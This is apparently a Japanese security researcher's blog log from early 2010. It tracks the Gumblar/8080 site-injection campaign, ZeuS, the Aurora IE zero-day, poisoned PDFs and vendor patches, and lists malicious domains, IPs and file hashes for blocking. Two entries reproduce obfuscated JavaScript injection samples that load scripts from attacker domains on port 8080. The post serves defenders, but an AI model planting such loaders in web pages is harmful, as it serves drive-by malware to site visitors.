PhotoArchive Crimeware/Client-Side Exploits Serving Campaign in the Wild -- ddanchev
ZDnetでおなじみの、Dancho Danchev氏は pushdoとの関連も指摘しています。

and ! Happy Birthday !
Happy Birthday ZeuS Tracker!
During the last year, ZeuS Tracker has tracked more then 2′800 malicious ZeuS C&C servers. The ZeuS Tracker has captured more then 360MB ZeuS config files and 330MB binaries.
also Thanks 1und1

----------
MiFi cracked
Verizon MiFi Device Hacked
長い・・
Fortunately, there are a couple of options available to us to mitigate this attack.
* Change the Default PSK
* Change the Default SSIDC
Mifi : myWiFi

----------
Conficker掃討作戦
in マンチェスター警察
Manchester cops recover from Conficker
It is still not clear where the virus has come from but we are investigating how this has happened and are taking steps to prevent this from happening again.
感染経路は不明っと
The council infection of February wound up costing taxpayers £1.5m in lost parking ticket revenue and security clean-up fees.

----------
反撃
Adobe strikes back at Apple over iPad/Flash debacle
Open Access to Content and Applications

どっちもセキュリティホールを掘るのは得意なんですけどね・・・

----------
malcode with WordPress
Wordpress obfuscated javascript pointing to centiyo mal
ああ・・どっかでみたコードがっ（笑）

----------
沿革
8080系(いわゆるガンブラー系)記事のまとめ
結論：あるふぁぶろがーこわい
怖い怖い・・・
錬勤術のほうも気をつけましょうね（気をつけようがないのかっ！）
※手当てなしの勤務の場合はなんて呼ぶのかな（苦笑）

----------
8080
66.225.192.2 AS23352(SERVERCENTRAL) IL(Chicago)
83.1.83.4 AS5617(Polish Telecom)
200.35.148.184 AS15083(INFOLINK) FL
213.39.123.11 AS8928(INTEROUTE)
83.222.30.178 AS25532(MASTERHOST)
88.255.162.14 AS9121(TTNET)
212.146.105.75 AS5606(KQRO)
87.118.90.76 AS31103(KEYWEB-AS)

激しく攻撃サーバホスティングの変更が行われました。
というか勤勉にも程が・・

----------
Google Safe Browsing
| 1265227216 | B | [goog-black-hash 1.50250 update]
| 1265227201 | M | [goog-malware-hash 1.19108 update]
| 299554 | +6032(293522) 反転
| 1310611 |
EoF

This must be yet another revision

またか～と頭が痛くなりますね
アンチウィルスソフトに引っかかると、GoogleBlockされる（笑）可能性がありますので、以下の変更を行っています。
( → （
) → ）
/ → ／

try{window.onload=function（）{Iebf2d21q07z = '' + 'i）c（#i$b）!a&$-$（c$（））o&）m（（.@c&）!o&（@n（&s!）（t@!#a）n@!!t（@&（@c^$^#o^#n&t!a&&c!t（.!#（c（&@^o））$^m#&&.@&p@e@）^r&e#@）$z@h#（i!l!#^t（（@o@n!@@^-#$^c）^（o（&m）.#（b^i）$l&$（&!t$o^&!p^&.@&#&r!（u$:@））N#q#@5#（^b!（&@h$3）f&@）i#@t&$w&!1@r$#v!$／!&@$g####o（$@&&o（g$l）@!e@$.@（c$$
（）o&m&.$@（a^u!／^##g））（）o#^o#&#g$#l!^）e$$.&#c!o（$@m（$.!^^a!u）^!／@!t#$@o（（$r（!#r&（&e#^n$t^@^$s!&$^.（@r#!@u）$#&／（a@$l$#l!（e!^g$）（r&$#）o$^&.^p（）l!）^@／#$$##g#$o）@$o）$#^g（&l（e@.#!c&o&@m$#／^
'.replace（／#|@|\^|\$|\!|&|\）|\（／ig, ''） ;
Jq2dz9nff1w0lm = 'appendChild';Rkn5tmljhj1c = d ocument.createElement（'sc'+'ript'）;
Rkn5tmljhj1c.src = 'h'+'ttp:／／'+Iebf2d21q07z.replace（／Nq5bh3fitw1rv／g, '8080'）;Rkn5tmljhj1c.setAttribute（'defer', 'def'+'er'）;e val（'document.body.'+Jq2dz9nff1w0lm+'（Rkn5tmljhj1c）'）;} } catch（P052l4jn ） {}

decode:
iciba-com.constantcontact.com.perezhilton-com.biltop .ru:8080/google.com.au/google.com.au/torrents.ru/allegro.pl/google.com/

また、散布ISPにも変動があり、
77.72.25.34 AS44062(TESENE)
83.168.238.66 AS35041(NET-CRYSTONE)
の２者が参戦しています。

どこまで勤勉なんでしょうね・・・

孝明天皇祭
3分間電話の日
Windows Vista発売の日。(2007)
マハトマ・ガンディー暗殺の日(1948)

----------
iTunesの重複ID問題？
ｉＴｕｎｅｓ、ＩＤなりすましの恐れ　アップル社調査
千葉県の女性は約２週間前、実在する北海道の女性の利用画面に偶然に入ってしまった。千葉県の女性によると、新しく設定したＩＤでｉＴＳに接続し、パスワードを入れたところ、何度か「違う」と接続を拒まれた。パスワードを再登録し、再接続してみると、個人情報の画面に北海道の女性の住所や電話番号、クレジットカード番号の一部、誕生日などが表示された。商品を買えば、代金の請求は北海道の女性のクレジットカードで決済される状態だったとみられる。
あちゃ～
アップル社からは、かつて北海道の女性が同じＩＤを設定していて、その女性の個人情報がｉＴＳのコンピューターに残っていたために起きた可能性がある、と説明されたという。同社によると、一度登録されたＩＤやパスワードは、本人が申請しない限り消去しないという。
ちょっ・・
iTunes使ったこと無いのでわからないですが、重複可能IDで、ID削除=削除フラグ立てただけで再登録許可？とか？　マサカネ？（笑）

この問題にきちんとした説明がなされるまで、iTuneStoreに個人情報を入れるのはやめたほうが良いと思いますが、しばらくは説明されることは無いでしょう（だってAppleだし～）

----------
500$ per BUG
Encouraging More Chromium Security Research
A) As per Mozilla, our base reward for eligible bugs is $500.
というわけで、Chromeのセキュリティバグを見つけて通報すると 「500$ 獲ったど～」というキャンペーン（というかシステム）を開始するようです。
Googleなんだから $2000 くらい出せば？とか思ったりしちゃダメ
※最大 $1337 「獲ったど～」ですね

Heiseのキャッチが一番面白かったかな
Google invites attacks on Chrome

----------
セキュソフトの価値
アンチウイルスソフトウェアの仕組み--入れる価値はあるのか
How antivirus software works: Is it worth it?
この記事が完全に正鵠を得ているかどうかは、各個人の判断にお任せします。

しかし、最近の統合型セキュリティソフトは訳のわからない挙動をし、本来必要なプロセスを阻害し、正常なファイルを誤検知し、そして肝心の攻撃には無防備というケースが多すぎます。

セキュリティソフトはあくまでも保険であって、セキュソフトを入れるだけで安全という時代は既に過去のものです。
そのことをきちんと理解し、「最終的に自分を守れるのは自分だけ」ということを肝に銘じたいものです。

----------
APT
今日のキー(?)ワード
Advanced Persistent Threat (APT)
また変な用語が出てきた・・・
The Big Oil APT and Botnet Business
なんか、スパイ大作戦（ふるっ）のような内容でアレですが、確かにGhostNetなんか信じてなかったのに、今回のAuroraは結構信じられてますよね～

戦争の手段が電子化するにつれ、本気でそういうことを考えなければならなくなるのかもしれません。
が・・そんなことを一般人が考えてもしょうがないわけでして、ウチの国は大丈夫なんでしょうかネ？

Critical Infrastructure Protection Now

微妙に続く
----------
PPDF
P(oizon)PDFの散布が止まりません
via contagio
Jan 28 CVE-2009-4324 台美軍售最新情況.pdf The latest U.S. arms sales to Taiwan
Jan 28 CVE-2009-4324 PEER REVIEW--Assessing Chinese Military Transparency from phillip.saunders74@yahoo.com
Jan 27 CVE-2009-4324 + CVE-2009-0927 + CVE-2008-0655 letter to Solarz and US position on free speech rights
軍事系のメールを装っていることが多いのですが、関連の省庁の方、ちゃんと対策してるんですかね？

続く
----------
Adobe Phisherman's Work
アドビを装う新たなフィッシング詐欺メールにご注意
Adobeを装い、「Adobe Acrobat」「Adobe Reader」の新バージョンを通知すると見せかけた電子メールを送りつけ、個人情報などを盗もうとするフィッシング詐欺が新たに確認された。この電子メールは1月28日から送信されているが、Adobeでは、受信した場合は何もせずに削除するよう呼びかけている

さらに微妙に続く
----------
Hot(Cold) Fusion
Solution available for potential ColdFusion information disclosure issue
solution:
ColdFusion 9: How to limit access to the Solr collections
ColdFusion by default allows collections created by the Solr Service to be accessed from any external machine using a URL. This allows users to access information about the collections as well as search and index them.
意図しない不特定ユーザも、Solr検索サービスとクエリの閲覧が可能っと・・

Solr検索サービス

----------
CVE-2010-0006
Linux カーネルの IPv6 jumbogram 処理に脆弱性
細工された IPv6 jumbogram により、サービス運用妨害 (DoS) 攻撃を受ける可能性があります。
その前に、IPv6を導入してるところがどのくらいあ・・・

CVE-2010-0006 - kernel: ipv6: skb_dst() can be NULL in ipv6_hop_jumbo()

Fedora: "# yum update kernel"
Fedora update for kernel 2
Fedora update for kernel 2

----------
gzip
細工された gzip 圧縮ファイルを処理させることで、サービス運用妨害 (DoS) 攻撃を受けたり、ユーザの権限で任意のコードを実行されたりする可能性があります。
細工された IPv6 jumbogram により、サービス運用妨害 (DoS) 攻撃を受ける可能性があります。

CVE-2009-2624:
GNU gzip "huft_build()" Input Sanitation Vulnerability 3

CVE-2010-0001:
GNU gzip "unlzw()" Integer Underflow Vulnerability 3
Update to version 1.4. thru # yum update gzip

----------
その他穴ぼこっ

Hitachi Products Image File Processing Buffer Overflow 4
Update to a fixed version. See vendor advisory for details.

Geo++ GNCASTER Multiple Weaknesses and Vulnerabilities 4
Update to version 1.4.0.8.

ircd-ratbox Integer Underflow and NULL Pointer Dereference Vulnerabilities 4
Update to version 2.2.9(ircd-ratbox-2.2.9.tar.bz2).

oftc-hybrid "LINKS" Command Integer Underflow Vulnerability 4
Update to version 1.6.8(oftc-hybrid-1.6.8.tar.gz).

IRCD-hybrid "LINKS" Command Integer Underflow Vulnerability 4
Fixed in the SVN repository.

影響下にあるひとは・・・あまり多く無さそうですが

----------
Gumblar≠8080
もういいかげん後ろに™とかつけるのやめて欲しいと怒られましたので、従来どおり gumblar, Gumblar.x, 8080系の表記に戻そうと思います。

さて、その8080系ですが、誘導スクリプトの変更を（デバッグも含めて）実際の感染環境で行っており、コードがコロコロ猫の目のように変わっています。「実環境でテストするな！」って言っても聞いてくれなそうだしなぁ・・

Gumblar.xのときと違い、FTPでインジェクションを行ってくるIPとか、マルチドロッパによってインストールされるスニファの情報送信先とかの情報がぜんぜん出てこないので、感染時のインジェクションドロッパのドメイン・IPを地道にふさいでいくしかなさそうですが、これまた非常識なペースで変わっているので正直オテアゲです。

サイト改ざん止まず(1) 修復サイト再汚染が多発、PW変更/感染チェックを
サイト改ざん止まず(2) 改ざんサイト告知一覧（2010年1月14日～1月28日）
さすが、so-netさん。素早いですね。

いつも出てくるこの６行
(1) Microsoft Update（Windows Update）を実行しシステムを最新の状態にする
(2) Adobe Readerを最新版に更新する
(3) Adobe ReaderのAcrobat JavaScriptを無効に設定する
(4) JRE(Java Runtime Environment)を最新版に更新する
(5) Flash Playerを最新版に更新する
(6) QuickTimeを最新版に更新する

のほかに、うちとしては以下を加えたいですね。
(7) JREの古いバージョンが残っていないか確認し、確実に消す。
(8) FFFTPの使用を中止し、かならずレジストリから関連項目を消す。
(9) (S)FTP(S)クライアントに絶対にパスワードを保存しない。

参考：
10 FTP Clients Malware Steals Credentials From
Beware: FileZilla Doesn’t Protect Your Passwords
ガンブラー(/*Exception*/) vs Norton Internet Security 2010
[Hammmer and Anvil] 夜間便
8080（Gumblar）はFFFTPも狙うのだそうです。
CVE-2008-5353 の Exploit コードで脆弱な JRE が悪用されるのか確認する
JRE 1.6.0_u10 でのインストールパスの変更
自己責任：
JavaRa

厚生労働省のWebで「電子申請・届出システムによる手続」をするのに、申請用アプリ...
オワタ＼(^o^)／

----------
その他

Privacy issue in Google Toolbar fixed
IEでGoogle ToolBarを使っている方へ
古いGoogle Toolbarをアンインストールし、最新版を入れなおしましょう。

永遠のビギナー
対策っていわれても・・・

新手法のInjection
SOHU Digital Channel Web Site Compromised with Xunlei Thunder DapPlayer Exploit
Ciscoに取られちゃったScanSafeが、新手法系のレポートをやめてしまったので、WebSenseの情報への依存率上昇中・・他のソースも探さないと・・

ESET Smart Security / ESET NOD32アンチウイルスにおける誤検出について
ぷよ！

----------
ガンブラー なんじゃこりゃ
ガンブラー なんじゃこりゃ

isusualって何だろう・・・ unusualなのかな？
というか、コレ何語？（笑）

いつもお疲れ様です m(_ _)m

無理しちゃだめですよ～

----------
8080
MalwareURL(以下MalURL)では、8080系のことを、"Fragus Exploit Pack"と定義したようです。
※エクスプロイト・ツールキット「Fragus」，ビジネス・モデルを変更
yourtruemate.ru
genuinecolors.ru
superhighest.ru
gametopsite.ru

77.68.44.169 AS15418(FASTHOSTS)
IP: MDL(無) 77.68.44.169
AS:15418 AS15418

78.31.107.49 AS24931(DEDIPOWER)
IP: MDL(無) MalURL(無)
AS:24931 AS24931

82.165.47.29 AS8560(ONEANDONE-AS)
IP: MDL(無) 82.165.47.29
AS:8560 AS8560

87.118.90.76 AS31103(KEYWEB-AS)
IP: MDL(無) 87.118.90.76
AS:31103 AS31103

94.102.146.242 AS8426(CLARANET-AS)
IP: MDL(無) MalURL(無)
AS:8426 AS8426

A群のラウンドロビンがB群に統合されました。（恐らくキャッシュの行き渡るタイミングの問題？）IPの変動はありませんでした。

MDL/MalURLを調査してみましたが、どこも「防弾ホスト」としてしまうにはちょっと条件が薄い・・・
とりあえず単体IPだけ焼いて様子見しましょうか？

----------
Google Safe Browsing
| 1264795218 | B | [goog-black-hash 1.49890 update]
| 1264795205 | M | [goog-malware-hash 1.18988 update]
| 296782 | -2438(299220) 減少に反転
| 1293213 |
EoF

注意喚起
約７時間ほど前に、8080系の使用していた ru ドメインのうちの殆どが A レコードを失い、正引き不能になりました。
それと同時に、いくつかのインジェクションが変更された模様です。

こうしたインジェクション攻撃は、定期的にパターンを変更する傾向がありますので注意してください。
※8080系は Symantecの主張するガンブラー™と名づけられた攻撃手法の一つです。

ampsguide.ru
anycitytown.ru
authentictype.ru
burkewebservices.ru
carswebnet.ru
easylifedirect.ru
freeprosports.ru
funwebmail.ru
guidebat.ru
genuinehollywood.ru
genuinecolors.ru
halfsite.ru
homeproair.ru
homesaleplus.ru
lagworld.ru
saletradeonline.ru
suesite.ru
sugaryhome.ru
superaguide.ru
superpropicks.ru
theatticsale.ru
theaworld.ru
thechocolateweb.ru
thelaceweb.ru
themobilewindow.ru
themobisite.ru
viewhomesale.ru
webdesktopnet.ru
webdirectbroker.ru
webnetenglish.ru
webnetloans.ru
webnetenglish.ru
whosaleonline.ru
worldsouth.ru
worldwebworld.ru
yourtruemate.ru
※赤い色のドメインが残留、更にドメイン変更の可能性大。

----------
/* */ 消去？
From Hidden Iframes to Obfuscated Scripts -- comment
The script has a new revision already out and being injected into sites. A sample:

＜script＞ try{window.onload=function（）{document.write（'＜div id=megaid＞skysports-com.marketwatch＜/div＞'）;Whglbtpkg9yawk = document.getElementById（'megaid'）.innerHTML + '.）c^o#$$#m@（@.&&（!t&o（&&r##&&r!（$#e#@!n@t!s!）-@（r（u@$^.$$&y）!!o&!u#!!r##!t!&@!o@（$&p!@（&f$@i^l$m）^!@s（.（））r!#（&u!）@:&!&#）D）E）&#&B）（）U^&（@G&@（@/#（^c（（a!m）##）$4#@@.#&^c####&o（#!m）/@^c$&a^）@m（4&#.!@）（^c（$o@m!&!/（g）!!o&&#$o!g&（l&）^^e&#@.&^c#（o^&m!^$/（#m!^^c（&s$s@）l!^$.^&$c（（$o#（@m）（/@!&g@#o&!!$@o$##g$@#l$e&&）.#$c^#o$#!m#&）$.）（#e&&）^g）&/&'.replace（/&|#|\$|\）|\!|\（|\^|@/ig, ''） ;document.write（'＜scr'+'ipt src=http://'+Whglbtpkg9yawk.replace（/DEBUG/g, '8080'）+'＞＜/scr'+'ipt＞'）;} } catch（Xvp1q8pu ） {}＜/script＞
＜!--50e1dd63239a5e1b3900972f2e5de214--＞

という感じで攻撃手法の変更が報告されています。

2010.02.02
一部アンチウィルスソフトにひっかかると（携帯に）連絡があったので、半角括弧を全角に変更しました。

あぁ・・いたちごっこ

----------
あ～あ～
サーバーアプリの脆弱性突かれ、共有サーバー丸ごと改ざん
スタンダード10で提供しておりますfig(フォトアルバム)のセキュリティホールを利用し、不正なプログラムを設置、実行されたことが原因であると思われます。問題が発生した当該プログラムは削除済みです。

2010.01.06 水曜日
これかな（笑）
修正済みかと思ったけど、そうでもなかったらしいですね

----------
その他

iSlateなのか iPadなのか ・・・
明日がたのしみ・・・

６万５千円のディナーショー（CTスキャンつき？）お疲れ様でした（笑）

sophosのvirus info は詳細が無いので役に立たないと思うんですけど・・・

EoF(追記中）

日本最低気温の日
1902年、北海道旭川市で日本の観測史上最低気温-41℃を観測
これにちなんで、寒い日には暖かいものを食べてもらおうと「中華まんの日」「ホットケーキの日」も提唱されている。
カノッサの屈辱 via お詫びの日
神聖ローマ皇帝ハインリヒ4世が、教皇グレゴリウス7世による教会破門の許しを乞うためカノッサ城の門前で立ちつくし始める
左遷の日
延喜元年1月25日（旧暦。新暦では901年2 月16日）、大宰府に左遷されることになった菅原道真が京を出発した
くわばらくわばらの語源はこれだと思ってたのですが、どうも違うらしい・・
くわばらくわばら
「くわばらくわばら」ってなぜ雷のときに唱える？
初天神
1年で最初の天神の縁日。

----------

たまには、「今日は何も無い月曜の朝でした」 って書いてみたいけど、やっぱりダメだったか・・

----------
AOLのアップデートを騙るのはZeuS
AOL 日本ではイーモバイルの傘下に入っていますが、まだ AOL という名称は残っているようですし、サービスの提供も続いています。このAOL専用のインスタントメッセージサービスが、AIM(AOL Instant Messenger)で、使用するプロトコルはOscarという、独自のプロトコルを使用しています。
本題：
AOL Update spreads Zeus / Zbot -- GarWarner
「あなたのAIMアカウントは無効とされ、７２時間以内に再有効化の手続きをとらないと無効化されます」
どこかのテレホンショッピングみたいな・・・

で、誘導されるページの AIM UPDATE がウィルスなのは当然ですが、ページを踏んでしまった瞬間に既に drive by download（「ガンブラー™©Symantec」）によって、以下のマルウェアが駆動させられている可能性があります。
Analysis report for hXXp://109・95・114・251/usr5432/in.php
abs.exe Result: 5/41 (12.20%)
これかな？
Hiloti.gen

products/aimController.php
をばら撒いているのは、いつものような大量の .pl .im ドメインに分岐しており、行き先はZeuS陥落ノードです。

----------
偽ソフトの危険度
「ウイルスを検出したのでお金を払って」――偽ソフト詐欺の傾向と対策 (1/2)
概ね賛成ですが
偽ソフト詐欺を完全に防ぐ方法は、ほかのセキュリティの脅威と同様に存在しない。被害に遭わないように、普段から正規のセキュリティ対策ソフトやOS、アプリケーションを最新の状態に維持する。不審なメールは絶対に開かず、確認する。万が一攻撃に直面しても冷静に対処し、PC環境を回復できる準備をしておくといった、基本的な対策を徹底するしかない。
ここまで書いてあるなら、この部分により具体的な対策を書けばA-評価
あと、根本的に、偽ウィルスソフト＝普通のウィルスよりも性質の悪いバックドアのことが多く、一度感染したら安全のためリカバリ推奨という点を含めればA+評価だったでしょう。

オマエハ何様だ！？って言われそうですが・・（苦笑）

実際のトコ、現在問題になっている "Security Tool"で最も恐ろしいのは、Security Toolsをダウンロードしてきたマルチドロッパが深く潜伏しており、それが生きていれば、「マルウェアを次々とアップデートさせられ、延々と情報を抜かれっぱなし」という現実にどのくらいの人が気が付いているのか？という部分になると思います。
この点を明確に指摘し、注意喚起をしているのは、Unmask Parasiteさんとso-netさんくらいでしょうね・・・

現時点でも、優れた「コンポネンツ・プラグイン系のアップデートを促す記事」ってこれくらいしか見当たらないのですが、他に何かあったら教えてください。
初心者必読！ しないと怖い「プラグイン」アップデートの方法 -- 2009.06
※2009.06時点のバージョンなので、バージョン番号は各個最新へのリプレスが必要。
わかりますか？ この言葉～「プラグインの更新なんて無理！」という方に
ホームページからの感染を防ぐためには
※総務省がんばってます

----------
ガンブラー™の被害って日本だけなの？
というメールを頂きました。
最近のケースをみてると、日本だけなのでは？というくらい被害報告が多いですが、ちゃんと（？）海外でも汚染が広まっています。
From Hidden Iframes to Obfuscated Scripts : Comments
ただ、ここのサンプルにも挙げられているように、どんどん日本の有名ドメイン名を混ぜる比率がたかまっていますので、より日本にターゲットをシフトしている可能性があります。
search: obfuscated
nikkansports.comとかlivedoor.comとか、日本のこと知ってないと埋めれない気もするんですけど、逆引き名から取ったのかな？
今はまだ Security Toolsの日本語版など聞いたことがありませんが、他の偽セキュには既にMO/POによる各国語版があるようなので、そういうのが飛び交うようになると、ますます事態が深刻化するでしょう。

嫌なコラボ：
Gumblar.8080改ざん『/*Exception*/』と出会い系リンク
/*Exception*/ document.write('出会いサイト・・・・
・・・・・・
わ・・笑っちゃダメだ・・・

----------
はいPoC
Firefox 3.6 (XML parser) Memory Corruption PoC/DoS
Verified: yes
3.6.1 soon ・・・かも

----------
必要悪
The necessary evils: Policies, Processes and Procedures
監査をして出てくるのは、社員がポルノサイトを巡回していたという事実だけ・・・っと。

So, since its the beginning of a new year, take some time and update your policies and look at your processes and procedures. Have they changed? Do they need updating? Are they even helpful?
このへんはセキュ会社の人が一番よく陥る罠でしょうが、「基本的に誰もセキュリティにお金（時間含む）なんか払いたくない」んですよ。業務でセキュを語ると厄介者扱いにされるのがオチです。
だから、自分と周辺の人、自分の顧客だけ安全であればいいや～という感覚に陥ります。

それ以上の広範な安全を守るのは、専属の機関が本来はやるべきことなんです（タブンネ）。

----------
その他

最近TwitterがTVなんかで大流行ですが・・
Breaking Koobface’s Captcha Solving Process
Koobface’s captcha breaking infrastructure(figure)
CAPTCHA破りに加担させられる koobface botnet端末の一員っと・・
koobface陥落ノードは日本国内でもジワジワ増加しています。

そして CAPTCHAはどんどん・・・

----------
Aurora Exploits
Hydraqやら呼び名が分散しているのはいつもの通りですが、とりあえず、Microsoftに感謝されているMcAfeeの名称を尊重しておきましょう。
CVE-2010-0249 in the wild – part 0.2 -- extraexploit

AS30058(FDCSERVERS)
FDCSERVRSはちょこちょこ悪意検索にひっかかるのですが、意図的な防弾ホストとは違い、それなりに takedown してるようです。

hXXp://www・qvodcom1・com/360/ie2.htm
hXXp://www・qvodcom1・com/360/what.jpg　-- 200 -- text/javascript
このへんが特徴っぽいですね

qvodcom1・com
撃墜（笑） by Symantec

MD5:0x8FE3779F8D56126393194406EAE60780
またマルチドロッパか・・・
The data identified by the following URLs was then requested from the remote web server:
hXXp://www・qvodcom1・com/以下イロイロ

KILL:
76.73.50.219
qvodcom1・com

----------
その他

182 malicious domains to block
sources: www.malwareurl.com, malwareint.blogspot.com, www.malwareurl.com and others:
fitme .jp
AS4694(SoftbankIDC)
合掌

夢のコラボ：
zly・hacked・jp AS16276(OVH paris)
安心！

----------
暗雲
また？
VUPEN Security Research - Upcoming Advisories
VUPEN-SR-2010-02 - Adobe XxXxXxX Heap Overflow Code Execution Vulnerability
VUPEN-SR-2010-01 - Adobe XxXxXxX Heap Overflow Code Execution Vulnerability

VUPENの情報はとにかくclosedなので、詳細不明なのですが・・

----------
Gumblar.8080
82.192.88.35 AS16265(LEASEWEB) WELCOME BACK !
91.121.4.99 AS16276(OVH Paris)
91.121.88.218 AS16276(OVH Paris)
94.23.4.164 AS16276(OVH Paris)
217.23.5.27 AS49981(WORLDSTREAM)

----------
Google Safe Browsing
| 1264363222 | B | [goog-black-hash 1.49530 update]
| 1264363202 | M | [goog-malware-hash 1.18874 update]
| 294784 | +34(294750) 微増に転じた
| 1273617 |

----------
余談
寝カフェ（あえて修正しない）とか、ホテルの共有PCなんかは、ハードウェア・キーロガーとか仕込まれてそうなので怖いですよね

EoF

飛行船の日
1916年1月22日に、初の国産飛行船である陸軍の「雄飛号」が所沢～大阪間で実験飛行を行った
ジャズの日 Ja(January)ZZ(22)
カレーの日
1982年、学校給食開始35周年を期に制定

----------

皆様のコメントに感謝いたします。
本文で返すことが多いのは癖ですので、返事が無いよ～とか気を悪くされた方、申し訳ありません。

----------
Microsoft Emergency Patch


Internet Explorerの更新プログラムを提供開始 (MS10-002)
小野寺です。
なお、MS10-002は、アドバイザリでお伝えしていた脆弱性 (CVE-2010-0249)を含めて、計8件に対応しています。
いつもすばやい更新お疲れ様です。（某レンガの会社はまだない・・）

[MS10-002] Internet Explorer 用の累積的なセキュリティ更新プログラム (978207)
追加されている７つのCVEのうち、detailが出ているのは
CVE-2009-4074 - XSS フィルターのスクリプト処理の脆弱性
だけです。

尚、この攻撃が中国で浸透していた理由として、高い IE6 使用率が挙げられています。
New Clues Draw Stronger Chinese Ties to ‘Aurora’ Attacks
nearly 60 percent of computer users in China browse the Web with IE6
多すぎる・・・
Warner shared evidence with krebsonsecurity.com that one of China’s most-visited anime sites was recently hacked and seeded with the Aurora exploit, serving those who visited with IE6 a Trojan that dropped at least 32 different malicious programs, including password stealers and tools used to enlist infected PCs in coordinated, distributed cyber attacks.
最近、中国のサイトからアニメを落とした方、心当たりはありませんか？（苦笑）

Microsoft January Out of Band Patch
MicrosoftがIE用の修正パッチを臨時公開へ、中国発の攻撃に対応
Patch Released for Recent Microsoft Zero Day (CVE-2010-0249)
New IE Zero-Day Exploit Attacks Continue

続く
----------
Trojan Hydraq
リモートから権限奪取する機能をもった Operation Aurora(aka Hydraq)ですが、シス管の皆様方には心臓に悪いVideoが公開されています。
The Hydraq VNC Connection
Once Trojan.Hydraq is installed by means of an exploit, it downloads additional files from a remote location to aid with the attack. Two of the additional files downloaded are named VedioDriver.dll and Acelpvc.dll. These files are placed into the %System% folder on the exploited computer.
The Hydraq VNC Connection
本当に心臓に悪い・・・

感染のチェックは以下のファイルの存在（しちゃだめ！）を確認してください
How Can I Tell if I Was Infected By Aurora?
チェックサムはMD5
securmon.dll:
E3798C71D25816611A4CAB031AE3C27A
Rasmon.dll:
0F9C5408335833E72FE73E6166B5A01B
a.exe:
CD36A3071A315C3BE6AC3366D80BB59C
b.exe
9F880AC607CBD7CDFFFA609C5883C708
AppMgmt.dll
6A89FBE7B0D526E3D97B0DA8418BF851
A0029670.dll
3A33013A47C5DD8D1B92A4CFDCDA3765
msconfig32.sys
7A62295F70642FEDF0D5A5637FEB7986
VedioDriver.dll
467EEF090DEB3517F05A48310FCFD4EE
acelpvc.dll
4A47404FC21FFF4A1BC492F9CD23139C

SyamntecはZeuSとの関連を示唆していますが、もしZeuS系がこれを知ってたら速攻で現在のキャンペーンに組み込んだことでしょう・・そうならなかったことだけが救いなのかな？

もうすこし続く
----------
Microsoft KNEW ZERO-DAY

Microsoft knew of IE zero-day flaw since last September
Microsoft Knew of IE Zero-Day Flaw Since September
Microsoft today admitted it knew of the Internet Explorer flaw used in the attacks against Google and Adobe since September last year.
あらあら・・
"Customers would have to open a malicious file to be at risk of exploitation," Microsoft's Bryant said, urging users to disable ActiveX controls in Microsoft Office.

まさか Google相手だしほったらかしておいたとか・・？
そんなことは～無いですよねぇ～？ > バルマー氏

[MS10-002] Internet Explorer 用の累積的なセキュリティ更新プログラム (978207)(再掲)
マイクロソフトにご協力いただき、Internet Explorer 6 のお客様に対する限定的な標的型攻撃の詳細を提供してくださった下記の企業に対し、マイクロソフトは深い謝意 を表します。
•Google Inc. および MANDIANT
•Adobe
•McAfee
•フランス政府 CSIRT CERTA

----------
Microsoft Another ZERO-DAY
Windows カーネルの脆弱性 (アドバイザリ 979682)
小野寺です。
Windows カーネルに関連する特権の昇格の脆弱性情報が一般に公開されました。現在調査を行っていますが、現時点では、16bitアプリケーションの互換性を確保するための機能部分が影響を受けることが分かっています。そのため、影響を受けるのは、32bit版Windowsとなり、64bit版は影響を受けません。
回避策を有効にする:
reg ADD "HKLM\System\CurrentControlSet\Control\WOW" /v DisallowedPolicyDefault /t REG_DWORD /d 1

New Microsoft Advisory: Vulnerability in Windows Kernel Privilege Escalation (CVE-2010-0232)
But be aware that there is a reason for this feature: Some old (very old) applications do require 16 bit support.

ちなみに、64bit版に影響がない根拠は
NT以降の全ての32ビットWindowsバージョンでユーザー権限昇格を許すバグが見つかる
64-bit用のWindowsでは最初から16-bitアプリを一切実行できない(MSDOS/WOWEXECサブシステム自体がそもそも存在しない)。
ということです。
このVDM用のコードを使うと、権限を持たないユーザーでも任意のコードをシステムのカーネルに挿入できる。つまり、OSの最もビンカンな所に変更を加えられる。
何だかアレゲすぎる脆弱性ですよね・・・

影響を受ける人：
Microsoft脆弱性
というか、何ですかそのボリューム名(0dayWAREZ)は・・・・

最強の運賃計算ツール、mars.exe [swa.gr.jp]がいまだにDOSアプリです。
Windows 3.1 時代のエロゲとか。
なるほど納得・・・・

Windowsの脆弱性は32ビット版のみに影響、MSがアドバイザリー公開

私もチキンなので、速攻で倒しましたよ (at 64bit Win7)

----------
PPDF spreading fast
PoisonedPDFの拡散が激しくなっています。
「Operation Aurora」をエサにした標的型攻撃
だから、レポートとかをPDFで頒布するのはもうヤメましょうよ・・・
※じゃ何がいいんだ！？って言われると困るわけですが・・・

Targeted Email Examples Relating to Microsoft Internet Explorer 0-day CVE-2010-0249
MSも、せめて今回のパッチに Adobe Readerの脆弱性チェックくらいは入れてもよかったのでは・・・

Adobe Reader 9.3.0
どうしても 8.2 ぢゃないとイヤという駄々っ子へ
http://ardownload.adobe.com/pub/adobe/reader/win/8.x/8.2/jpn/AdbeRdr820_ja_JP.msi

----------
Mozilla release and update

Released:
Firefox 3.6

Updated:
Thunderbird 3.0.1
Thunderbird 3.0.1 で修正済み

管理者モードで起動しないと通知すら来ないのは問題ですね・・・

----------
穴ぼこっ

Rockwell Automation Allen-Bradley MicroLogix PLC に複数の脆弱性
PLC が設置されているネットワークにアクセス可能な第三者によって、PLC の設定を変更されたり、サービス運用妨害 (DoS) 攻撃を受けたりする可能性があります。
2010年1月20日現在、対策方法はありません。
solution: PLC が設置されているネットワークへのアクセスを制限する

IBM Lotus Domino Buffer Overflow Vulnerability 3
Unpatched: Restrict network access to the LDAP service.

Cisco IOS XR SSH Denial of Service Vulnerability 2
update to fixed virsion:
Cisco Security Advisory: Cisco IOS XR Software SSH Denial of Service Vulnerability

----------
ガンブラー™

Symantec:
Gumblar Botnet Ramps Up Activity
だから、あなたのとこは、Gumblar.xとGumblar.8080(新種）のどっちの「ブロック」の話をしてるのか明確にしなさいってば
直近の日がハネあがってたので気になったけど・・・・
According to Wikipedia, sites become infected using passwords obtained from site admins. The host site will access a website via FTP and infect the website.
(Virusビヘイビアの）ソースをWikipediaに頼るのですか、そうですか・・・

TrendMicro:
SASFIS Fizzles in the Background
SASFIS variants usually be downloaded while visiting sites that have been compromised using the Eleonore Exploits Pack as a file named load.exe. Upon execution, these create temporary files and modify registry entries. They then attempt to send a GET request to a remote site to download another file usually named max.exe, which will again download another file named max_b.exe, a FAKEAV variant.
